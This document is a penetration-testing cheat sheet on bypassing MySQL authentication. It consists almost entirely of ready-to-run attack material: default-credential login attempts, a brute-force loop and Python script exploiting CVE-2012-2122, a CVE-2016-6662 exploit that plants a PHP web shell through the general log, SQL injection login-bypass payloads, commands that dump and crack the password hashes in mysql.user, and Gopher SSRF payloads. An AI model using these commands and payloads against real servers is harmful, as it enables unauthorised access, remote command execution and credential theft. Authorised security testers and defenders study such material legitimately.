MySQL Authentication Bypass

MySQL Authentication Bypass

Default & Empty Credentials

The most common MySQL authentication issue is simply missing or default credentials. Always test these before attempting complex exploits.

-- Try connecting with no password
mysql -u root -h target.com
mysql -u root -h target.com -p''

-- Try common credentials
mysql -u root -h target.com -proot
mysql -u root -h target.com -pmysql
mysql -u root -h target.com -ptoor
mysql -u admin -h target.com -padmin
mysql -u root -h target.com -p123456

-- Check for anonymous users (no username or password needed)
mysql -h target.com
mysql -u '' -h target.com

-- Scan with nmap
nmap -p 3306 --script mysql-empty-password target.com

CVE-2012-2122 — Authentication Bypass via memcmp()

In MySQL 5.1.x and 5.5.x (before 5.5.24 / 5.1.63), a flaw in how memcmp() handles password comparison means that sending a wrong password approximately 1 in 256 times would authenticate successfully.

-- Brute force the timing attack
for i in $(seq 1 1000); do
    mysql -u root -pwrong -h target.com -e "SELECT 1" 2>/dev/null && echo "BYPASS at attempt $i" && break
done

-- Python version
import subprocess, sys
for i in range(1000):
    result = subprocess.run(['mysql','-u','root','-pwrong','-h','target','-e','SELECT 1'], capture_output=True)
    if result.returncode == 0:
        print(f"Bypassed at attempt {i}")
        break

-- Check vulnerable version
SELECT version();   -- 5.1.x < 5.1.63 or 5.5.x < 5.5.24

CVE-2016-6662 — my.cnf Injection

-- Requires: FILE privilege + MySQL running as non-root
-- Write malicious config to /etc/mysql/conf.d/
SELECT '\n[mysqld]\ngeneral_log_file=/var/www/html/shell.php\ngeneral_log=ON\n'
INTO DUMPFILE '/etc/mysql/conf.d/exploit.cnf';

-- After MySQL restart, logging goes to web shell location
-- Then trigger log write:
SELECT '<?php system($_GET["cmd"]); ?>';

Authentication via SQL Injection in Login Forms

-- Classic bypass payloads for MySQL
username: admin'-- -
username: admin'#
username: ' OR 1=1-- -
username: ' OR '1'='1'-- -
username: admin') OR ('1'='1'-- -
username: ') OR 1=1-- -

-- Password field injection
password: ' OR '1'='1
password: anything' OR 'x'='x

-- With UNION to bypass hash comparison
username: ' UNION SELECT 1,'hash_you_know',3-- -
-- The app compares submitted password against your known hash

-- Bypass prepared statement using second-order
-- 1. Register: username = admin'-- -
-- 2. Stored safely
-- 3. Used unsafely in password change query → auth bypass

Hash Cracking

-- Dump hashes
SELECT user, host, authentication_string FROM mysql.user;
SELECT user, host, password FROM mysql.user;  -- older MySQL

-- Hash formats
-- MySQL 4.0: 16 hex chars  e.g. 6f8c114b58f2ce9e
-- MySQL 4.1+: *SHA1(SHA1(pass)) e.g. *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19

-- Crack with hashcat
hashcat -m 300 hashes.txt /usr/share/wordlists/rockyou.txt    -- MySQL4.1/5+
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt   -- bcrypt (rare)

-- Crack with john
john --format=mysql-sha1 hashes.txt --wordlist=rockyou.txt

-- Online lookup
-- https://crackstation.net
-- https://hashes.com

MySQL over SSRF / Gopher

-- If SSRF is available, attack MySQL via Gopher protocol
-- Gopher can send raw TCP bytes → speak MySQL protocol

-- Generate Gopher payload with Gopherus
python3 gopherus.py --exploit mysql
# Input: root (username), no password, command

-- Payload looks like:
gopher://127.0.0.1:3306/_%A3%00%00%01%85%A6%FF%01...

-- Works when:
-- MySQL is on localhost (127.0.0.1:3306)
-- Root has no password
-- SSRF supports Gopher protocol (curl, file_get_contents with wrappers)